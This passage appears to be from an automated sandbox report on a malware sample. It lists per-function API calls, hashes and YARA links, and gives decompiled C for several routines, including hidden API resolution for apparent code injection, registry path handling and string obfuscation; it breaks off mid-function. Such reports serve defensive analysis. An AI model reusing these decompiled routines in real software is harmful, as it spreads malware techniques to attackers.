Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0308526A
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 03085288
CloseHandle.KERNEL32(00000000), ref: 03085297
CloseHandle.KERNEL32(?), ref: 0308529C
GetLastError.KERNEL32 ref: 030852A0
HeapFree.KERNEL32(00000000,?), ref: 030852BC

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 91923200-0
Opcode ID: 2fc544d5ea0fea24660b67c78f83e584c9acd377bfa4763dd433201e9f231a38
Instruction ID: da1ab14a5947d75ded089102ef7de87d012aeea4bdb3284840dd5fe4b8501039
Opcode Fuzzy Hash: 2fc544d5ea0fea24660b67c78f83e584c9acd377bfa4763dd433201e9f231a38
Instruction Fuzzy Hash: E8316875902219EFCB11FBA4CC48ADEBFB8EF4A310F104461E285E7110D735AA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB658, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 431COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1DB7F2

Strings

*?, xrefs: 6E1DB69B

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 1fb5bc2f0a3f74d3b2cc2f05bcf8fa768755c38a9f5db95e5c6dd433e8dcda04
Instruction ID: bc06fe8266e69ea428ea49df86fcda8c9bbc1075c9fd02caa47e3d7618cfa99d
Opcode Fuzzy Hash: 1fb5bc2f0a3f74d3b2cc2f05bcf8fa768755c38a9f5db95e5c6dd433e8dcda04
Instruction Fuzzy Hash: 7AE16DB5E002199FCB14CFA9C8809EEFBF5EF48710B25856AD816E7344E7349E85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D973E, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON

Download Yara Rule

APIs

Part of subcall function 6E1D7990: GetLastError.KERNEL32(00000000,0000FFFF,00000004,6E1C2130,0000FFFF,?,0000FFFF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7995
Part of subcall function 6E1D7990: SetLastError.KERNEL32(00000000,6E27E108,000000FF,?,6E1D665B,00000000,0000FFFF,?,?,00000000,?), ref: 6E1D7A33

_free.LIBCMT ref: 6E1D9A4B
_free.LIBCMT ref: 6E1D9A64
_free.LIBCMT ref: 6E1D9AA2
_free.LIBCMT ref: 6E1D9AAB
_free.LIBCMT ref: 6E1D9AB7

Strings

C, xrefs: 6E1D989A

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 3555fc9bc456d6225b9f1dd58a40e77bb45e97f98648f2454642214efec7500a
Instruction ID: 1884f38c12ba277bebffd7a38dc30001e49d6d3c022b13351126fa9d4c566b3d
Opcode Fuzzy Hash: 3555fc9bc456d6225b9f1dd58a40e77bb45e97f98648f2454642214efec7500a
Instruction Fuzzy Hash: 60C16B75A0122A9FDB24DF98C8A4A9DB3B5FF58304F2045EAD909A7350E770AED4DF40

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D92B3, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 6E1DF6DA: RtlAllocateHeap.NTDLL(00000000,000000FF,000000FF), ref: 6E1DF70C

_free.LIBCMT ref: 6E1D93C2
_free.LIBCMT ref: 6E1D93D9
_free.LIBCMT ref: 6E1D93F6
_free.LIBCMT ref: 6E1D9411
_free.LIBCMT ref: 6E1D9428

Strings

K$n, xrefs: 6E1D9306

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID: K$n
API String ID: 3033488037-208850606
Opcode ID: bc270863c6cf8b61c0b14eed19b16b43b9074a94c96ad05f6f2e2ceafe448922
Instruction ID: 1c671f633f9248faf9df5a9621da0d56624cacf300a2eb38360c88a5d0a55a22
Opcode Fuzzy Hash: bc270863c6cf8b61c0b14eed19b16b43b9074a94c96ad05f6f2e2ceafe448922
Instruction Fuzzy Hash: 6951F372A04605EFDB11CFADC8A1B9A73F9EF58324F200669E415DB290E771E985DB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E3E04, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E1E3AEF: _free.LIBCMT ref: 6E1E3B14

_free.LIBCMT ref: 6E1E3E52

Part of subcall function 6E1D621F: HeapFree.KERNEL32(00000000,00000000,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?), ref: 6E1D6235
Part of subcall function 6E1D621F: GetLastError.KERNEL32(?,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?,?), ref: 6E1D6247

_free.LIBCMT ref: 6E1E3E5D
_free.LIBCMT ref: 6E1E3E68
_free.LIBCMT ref: 6E1E3EBC
_free.LIBCMT ref: 6E1E3EC7
_free.LIBCMT ref: 6E1E3ED2
_free.LIBCMT ref: 6E1E3EDD

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 75faa5f3869be2b1b32b9dd7925961a73806d4ee6c0b8a03090f7478cc611a18
Instruction ID: cdac3c1d58a38ca979887674ad6460eae48730b16b6d0ee66f44b918e0c37183
Opcode Fuzzy Hash: 75faa5f3869be2b1b32b9dd7925961a73806d4ee6c0b8a03090f7478cc611a18
Instruction Fuzzy Hash: 55116D31590B08EBD520E7F1CC49FCB77DC9F40704F410C14B2A9B6461EB2AE9C56660

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5CCA, Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,00000000), ref: 6E1E5D12
__fassign.LIBCMT ref: 6E1E5EF1
__fassign.LIBCMT ref: 6E1E5F0E
WriteFile.KERNEL32(?,00000020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1E5F56
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E1E5F96
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E1E6042

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: d81a20376d641e8e699562407d569c09feed7e92fe795025f035ae9b9cbdddfa
Instruction ID: fee869cc93a00c91eed550c4141bfb9add2cc661b9757dcf7f76a3abcdc2bc3c
Opcode Fuzzy Hash: d81a20376d641e8e699562407d569c09feed7e92fe795025f035ae9b9cbdddfa
Instruction Fuzzy Hash: CFD1ABB1D006599FDF15CFE8C8809EDBBB5BF09304F24016AE965FB242D730A986DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CBA70, Relevance: 9.2, APIs: 6, Instructions: 221COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E1CBB00
_free.LIBCMT ref: 6E1CBB1B
_free.LIBCMT ref: 6E1CBB26
_free.LIBCMT ref: 6E1CBC33

Part of subcall function 6E1D61BC: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6E1D61FD

_free.LIBCMT ref: 6E1CBC08

Part of subcall function 6E1D621F: HeapFree.KERNEL32(00000000,00000000,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?), ref: 6E1D6235
Part of subcall function 6E1D621F: GetLastError.KERNEL32(?,?,6E1E3B19,?,00000000,?,?,?,6E1E3E1D,?,00000007,?,?,6E1E2465,?,?), ref: 6E1D6247

_free.LIBCMT ref: 6E1CBC29

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID: _free$Heap$AllocateErrorFreeLast
String ID:
API String ID: 4150789928-0
Opcode ID: 3db7ffb07e6fa87cbc10fa2916e535cdc84089f82fbde799b3de6fc179c22770
Instruction ID: e0bcd77311f8d0650c6fe68b7ea0636ad25a5d11eee69e9c2cb2dd249130cc2a
Opcode Fuzzy Hash: 3db7ffb07e6fa87cbc10fa2916e535cdc84089f82fbde799b3de6fc179c22770
Instruction Fuzzy Hash: 1B5180365042155BDB04CFE89850FFA73B8DFA5B14F200859E940D7248EB3ADD86E251

Uniqueness

Uniqueness Score: -1.00%

Function 03082902, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0308295E
SysAllocString.OLEAUT32(0070006F), ref: 03082972
SysAllocString.OLEAUT32(00000000), ref: 03082984
SysFreeString.OLEAUT32(00000000), ref: 030829E8
SysFreeString.OLEAUT32(00000000), ref: 030829F7
SysFreeString.OLEAUT32(00000000), ref: 03082A02

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: ac1a31c0b198dec09a5d74df0eb917652f1de962f6d4079927ec19035fe654fe
Instruction ID: a58e62c34e772ee52d6e0dfaaf35be1bc9b1a99ea9e976896ced8e83cc829dfc
Opcode Fuzzy Hash: ac1a31c0b198dec09a5d74df0eb917652f1de962f6d4079927ec19035fe654fe
Instruction Fuzzy Hash: 6D314D36D01609EFDB41EFB8C844ADFB7BAAF49310F154425ED90EB210DB759906CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03084F5A, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03084F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E03086837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x308a2d4; // 0x2b2d5a8
					_t1 = _t23 + 0x308b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x308a2d4; // 0x2b2d5a8
					_t2 = _t26 + 0x308b792; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E030850CA(_t54);
					} else {
						_t30 =  *0x308a2d4; // 0x2b2d5a8
						_t5 = _t30 + 0x308b77f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x308a2d4; // 0x2b2d5a8
							_t7 = _t33 + 0x308b74e; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x308a2d4; // 0x2b2d5a8
								_t9 = _t36 + 0x308b72e; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x308a2d4; // 0x2b2d5a8
									_t11 = _t39 + 0x308b7a2; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E03084248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x03084f69
0x03084f6d
0x0308502f
0x03084f73
0x03084f73
0x03084f78
0x03084f8b
0x03084f8d
0x03084f92
0x03084f9a
0x03084fa1
0x03084fa5
0x03084fa8
0x03085027
0x03085028
0x03084faa
0x03084faa
0x03084faf
0x03084fb7
0x03084fbb
0x03084fbe
0x00000000
0x03084fc0
0x03084fc0
0x03084fc5
0x03084fcd
0x03084fd1
0x03084fd4
0x00000000
0x03084fd6
0x03084fd6
0x03084fdb
0x03084fe3
0x03084fe7
0x03084fea
0x00000000
0x03084fec
0x03084fec
0x03084ff1
0x03084ff9
0x03084ffd
0x03085000
0x00000000
0x03085002
0x03085008
0x0308500d
0x03085014
0x0308501b
0x0308501e
0x00000000
0x03085020
0x03085023
0x03085023
0x0308501e
0x03085000
0x03084fea
0x03084fd4
0x03084fbe
0x03084fa8
0x0308503d

APIs

Part of subcall function 03086837: RtlAllocateHeap.NTDLL(00000000,00000000,03084197), ref: 03086843

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,030851C4,?,?,?,?,00000000,00000000), ref: 03084F7F
GetProcAddress.KERNEL32(00000000,7243775A), ref: 03084FA1
GetProcAddress.KERNEL32(00000000,614D775A), ref: 03084FB7
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 03084FCD
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 03084FE3
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 03084FF9

Part of subcall function 03084248: memset.NTDLL ref: 030842C7

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 997f58224a9e99ba38837e95931b4ef2b36c951f36f6f45c9b5503f79c48d6c8
Instruction ID: 603c35edc05e0cbee905177d725467dde3d3bd69230b8b9ffd48ed4014d6ce32
Opcode Fuzzy Hash: 997f58224a9e99ba38837e95931b4ef2b36c951f36f6f45c9b5503f79c48d6c8
Instruction Fuzzy Hash: B02180B160234AAFD7A0FF69DC44E9BB7ECEB09244B044526E589C7602D739E905CF60

Uniqueness

Uniqueness Score: -1.00%

Function 03081D57, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E03081D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x308a38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E03084AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E03087702(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E030850CA(_a8);
						goto L29;
					}
					_t64 =  *0x308a2cc; // 0x5bb9c98
					_t16 = _t64 + 0xc; // 0x5bb9d8c
					_t65 = E03084AA6(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d030890
						if(E03085F2A(_t97,  *_t33, _t91, _a8,  *0x308a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x308a2d4; // 0x2b2d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x308b9e0; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x308b9db; // 0x55434b48
								_t69 = _t34;
							}
							if(E03085927(_t69,  *0x308a384,  *0x308a388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x308a2d4; // 0x2b2d5a8
									_t44 = _t71 + 0x308b86a; // 0x74666f53
									_t73 = E03084AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d030890
										E03081F7A( *_t47, _t91, _a8,  *0x308a388, _a24);
										_t49 = _t101 + 0x10; // 0x3d030890
										E03081F7A( *_t49, _t91, _t99,  *0x308a380, _a16);
										E030850CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d030890
									E03081F7A( *_t40, _t91, _a8,  *0x308a388, _a24);
									_t43 = _t101 + 0x10; // 0x3d030890
									E03081F7A( *_t43, _t91, _a8,  *0x308a380, _a16);
								}
								if( *_t101 != 0) {
									E030850CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d030890
					_t81 = E03086A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d030890
							E03085F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E030850CA(_t100);
						_t98 = _a16;
					}
					E030850CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E030877A4(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x308a38c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x03081d57
0x03081d60
0x03081d67
0x03081d6c
0x03081dd9
0x03081ddf
0x03081de4
0x03081deb
0x03081df2
0x03081df5
0x03081f60
0x03081f67
0x03081f67
0x03081f6c
0x03081f6e
0x03081f6e
0x03081f77
0x03081f77
0x03081dfb
0x03081e07
0x03081f56
0x03081f59
0x00000000
0x03081f59
0x03081e0d
0x03081e12
0x03081e15
0x03081e1c
0x03081e1f
0x03081e68
0x03081e68
0x03081e7b
0x03081e85
0x03081e8d
0x03081e92
0x03081e9c
0x03081e9c
0x03081e94
0x03081e94
0x03081e94
0x03081e94
0x03081ebe
0x03081ec6
0x03081ef4
0x03081ef9
0x03081f00
0x03081f05
0x03081f09
0x03081f3b
0x03081f0b
0x03081f18
0x03081f1b
0x03081f2b
0x03081f2e
0x03081f34
0x03081f34
0x03081ec8
0x03081ed5
0x03081ed8
0x03081eea
0x03081eed
0x03081eed
0x03081f45
0x03081f51
0x03081f47
0x03081f4a
0x03081f4a
0x03081f45
0x03081ebe
0x00000000
0x03081e85
0x03081e2e
0x03081e31
0x03081e38
0x03081e3e
0x03081e41
0x03081e43
0x03081e4f
0x03081e52
0x03081e52
0x03081e58
0x03081e5d
0x03081e5d
0x03081e63
0x00000000
0x03081e63
0x03081d71
0x00000000
0x03081d98
0x03081d98
0x03081da4
0x03081db7
0x03081dbd
0x03081dc5
0x00000000
0x03081dc5

APIs

StrChrA.SHLWAPI(030830C2,0000005F,00000000,00000000,00000104), ref: 03081D8A
lstrcpy.KERNEL32(?,?), ref: 03081DB7

Part of subcall function 03084AA6: lstrlen.KERNEL32(?,00000000,05BB9C98,7742C740,030813D0,05BB9E9D,030855DE,030855DE,?,030855DE,?,63699BC3,E8FA7DD7,00000000), ref: 03084AAD
Part of subcall function 03084AA6: mbstowcs.NTDLL ref: 03084AD6
Part of subcall function 03084AA6: memset.NTDLL ref: 03084AE8

Part of subcall function 03081F7A: lstrlenW.KERNEL32(?,?,?,03081F20,3D030890,80000002,030830C2,03084106,74666F53,4D4C4B48,03084106,?,3D030890,80000002,030830C2,?), ref: 03081F9F

Part of subcall function 030850CA: RtlFreeHeap.NTDLL(00000000,00000000,03084239,00000000,00000001,?,00000000,?,?,?,03086B8D,00000000,?,00000001), ref: 030850D6

lstrcpy.KERNEL32(?,00000000), ref: 03081DD9

Strings

\, xrefs: 03081DBD
(, xrefs: 03081E3A

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: a2f72cbe9d4138ebefe2225b82378ee1356f16e33400c6aa75ca69b9a0929375
Instruction ID: 0245d3857d502eca958f71fc3728aa755086ecc119a9e7ca2d63092114b8f074
Opcode Fuzzy Hash: a2f72cbe9d4138ebefe2225b82378ee1356f16e33400c6aa75ca69b9a0929375
Instruction Fuzzy Hash: 9251887610220AAFCF25FF60DC40EEA7BBAEF54300F048565FA959A162D739D926DF10

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DC3C1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E1DC3C6

Memory Dump Source

Source File: 00000004.00000002.476211742.000000006E1BE000.00000020.00020000.sdmp, Offset: 6E1BE000, based on PE: false

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 2ad29f4793b2e0085aa899e6740ee9eb38c0fbfb9297ce7c80aee9135e290fa7
Instruction ID: 29c18c01de684e3beca1f1e22061f4cee21b60fdd7184f929539c4cebfd692ba
Opcode Fuzzy Hash: 2ad29f4793b2e0085aa899e6740ee9eb38c0fbfb9297ce7c80aee9135e290fa7
Instruction Fuzzy Hash: EA219271204215BFD712DEF58C409AB77ADEF413687218E14E555DB140EB30ECC8EB60

Uniqueness

Uniqueness Score: -1.00%

Function 03086BE1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E03086BE1(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E03082902(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x308a2d4; // 0x2b2d5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x308b4c8; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x308b8f8; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x308a100() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x03086be1
0x03086be8
0x03086bec
0x03086bf1
0x03086bf8
0x03086bfb
0x03086c05
0x03086c0a
0x03086c16
0x03086c1d
0x03086c27
0x03086c27
0x03086c1f
0x03086c1f
0x03086c1f
0x03086c1f
0x03086c2d
0x03086c30
0x03086c38
0x03086c3b
0x03086c3e
0x03086c41
0x03086c46
0x03086c4f
0x03086c5c
0x03086c51
0x03086c57
0x03086c57
0x03086c62
0x03086c62
0x03086c6a

APIs

Part of subcall function 03082902: SysAllocString.OLEAUT32(?), ref: 0308295E
Part of subcall function 03082902: SysAllocString.OLEAUT32(0070006F), ref: 03082972
Part of subcall function 03082902: SysAllocString.OLEAUT32(00000000), ref: 03082984
Part of subcall function 03082902: SysFreeString.OLEAUT32(00000000), ref: 030829E8

memset.NTDLL ref: 03086C05
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 03086C41
GetLastError.KERNEL32 ref: 03086C51
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 03086C62

Strings

<, xrefs: 03086C16

Memory Dump Source

Source File: 00000004.00000002.472072456.0000000003081000.00000020.00000001.sdmp, Offset: 03080000, based on PE: true

Associated: 00000004.00000002.472055038.0000000003080000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472097788.0000000003089000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.472108010.000000000308A000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.472122190.000000000308C000.00000002.00000001.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: c21658c382da69821ac7b2a5cc29b5418fbafda6bf5adb517536338ac840b7c1
Instruction ID: 4bea4f052b7b9d4d9e6f298b585d8737a76065efc7ce6efd60a0143b8f7fc222
Opcode Fuzzy Hash: c21658c382da69821ac7b2a5cc29b5418fbafda6bf5adb517536338ac840b7c1
Instruction Fuzzy Hash: EA112A7190121CAFDB00EFA9D885BED7BF8EB08790F048416E945E7241D775D544CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 03082A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E03082A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E03086837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E030850CA(_v16);
								goto L37;
							}
							_t103 = E03086837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x308a2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
